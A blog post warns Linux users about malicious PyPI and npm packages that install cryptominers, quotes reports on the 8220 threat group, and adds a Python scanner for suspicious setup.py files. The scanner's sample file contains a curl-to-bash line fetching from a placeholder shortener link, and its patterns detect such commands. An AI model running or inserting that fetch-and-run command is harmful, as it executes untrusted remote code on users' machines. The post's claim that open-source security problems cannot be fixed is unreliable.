Linux users need to be aware of what they are downloading. PyPI (Python Package Index) is the official third-party software repository for Python.
Python is a high-level, interpreted, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation.
Python Software Foundation (PSF) is an American nonprofit organization devoted to the Python programming language … mission of the foundation is to foster development of the Python community and is responsible for various processes within the Python community, including developing the core Python distribution, managing intellectual rights, developer conferences including the Python Conference (PyCon), and raising funds.
- Python comes preinstalled on most Linux distributions.
- There are more than 200,000 Python packages in the world (and that’s just counting those hosted on PyPI, the official Python Package Index). That begs the question: with so many packages out there, which are the most important ones that every Python programmer needs to learn?
This caught my eye yesterday…
241 npm and PyPI packages caught dropping Linux cryptominers:
PyPI, npm flooded with cryptomining packages
Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.
While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.
“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.
“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.
The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via Bit.ly URL shortener.
Sounds like a ‘Cousin’ of the Gremlins!? 😉
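For the PyPI story above, here is an added example (not code from the malicious packages, the researcher or BleepingComputer) of a static check to run over a downloaded package's `setup.py` before installing it. The shortener list, the call list and the sample file are assumptions constructed for illustration.

```python
import ast
import re

# Assumed heuristics (not taken from the article): shortener hosts and shell-launching calls.
SHORTENERS = re.compile(r"https?://(bit\.ly|tinyurl\.com|t\.co|is\.gd)/", re.I)
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I)
EXEC_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call", "subprocess.Popen"}

def dotted_name(node):
    """Return 'os.system' for an Attribute/Name chain, else an empty string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def scan_source(source, filename="<package file>"):
    """Return sorted (line, reason) findings for one Python source file."""
    findings = set()
    try:
        tree = ast.parse(source, filename=filename)
    except SyntaxError as exc:
        # Python 2 or deliberately broken files cannot be parsed: flag for manual review.
        return [(exc.lineno or 0, "unparseable source, review by hand")]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.add((node.lineno, f"shell execution via {name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SHORTENERS.search(node.value):
                findings.add((node.lineno, "URL shortener link in string"))
            if FETCH_AND_RUN.search(node.value):
                findings.add((node.lineno, "download piped into a shell"))
    return sorted(findings)

# Constructed sample, not the real package code; the link is a placeholder.
SAMPLE_SETUP = '''\
import os
from setuptools import setup
os.system("curl -s https://bit.ly/PLACEHOLDER | bash")
setup(name="example-pkg", version="0.0.1")
'''

if __name__ == "__main__":
    for line, reason in scan_source(SAMPLE_SETUP, "setup.py"):
        print(f"setup.py:{line}: {reason}")
```

This is a heuristic only: aliased imports and obfuscated strings will slip past it, so treat a clean result as "nothing obvious" rather than "safe".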
Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers:
A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.
“The updates include the deployment of new versions of a crypto miner and an IRC bot,” Microsoft Security Intelligence said in a series of tweets on Thursday. “The group has actively updated its techniques and payloads over the last year.”
8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220.
Microsoft has tried to help Linux with their security issues, but there is just not much that can be done when it’s Open Source.
Will add this post to the *Linux Security Issues* page…
LINUX IS LIKE A BOX OF CHOCOLATES – you never know what you’re gonna get!